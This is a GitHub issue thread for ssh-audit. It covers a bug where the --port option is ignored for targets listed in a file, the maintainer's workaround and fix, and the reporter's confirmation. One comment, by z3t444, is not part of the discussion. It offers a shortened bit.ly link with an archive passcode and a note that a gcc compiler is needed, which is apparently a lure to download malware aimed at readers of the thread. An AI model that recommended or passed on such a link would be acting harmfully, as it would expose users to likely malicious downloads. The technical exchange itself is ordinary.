### ISSUE TITLE
Specifying port does not work

### ISSUE THREAD

**Issue by compass-dexter** [jtesta/ssh-audit#294]
Hello, while running `ssh-audit` on a non-standard port, I noticed that alternate port options is not respected:
```text
# ssh-audit --port=5022 --targets=ips_acm.txt
[exception] cannot connect to 10.x.y.a port 22: timed out
--------------------------------------------------------------------------------

[exception] cannot connect to 10.x.y.b port 22: timed out
```

ssh-audit is installed through `pipx`:
```text
# pipx list | grep ssh-audit
   package ssh-audit 3.3.0.dev0, installed using Python 3.11.9
    - ssh-audit
```

**Comment by z3t444** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by jtesta** [comment]
On Thu, 2024-09-05 at 06:23 -0700, compass-dexter wrote:
> # ssh-audit --port=5022 --targets=ips_acm.txt
> [exception] cannot connect to 10.x.y.a port 22: timed out

A workaround is to specify each target in the file with the format
"host1:5022".

I suppose I can update the code to use the --port value as the default
for all targets so this works as expected.

**Comment by jtesta** [comment]
I believe this is now fixed.  Please test this if you can, and re-open the issue if you find the problem still unsolved.

Thanks for reporting!

**Comment by compass-dexter** [comment]
Yes this works, thanks a lot for your quick response!
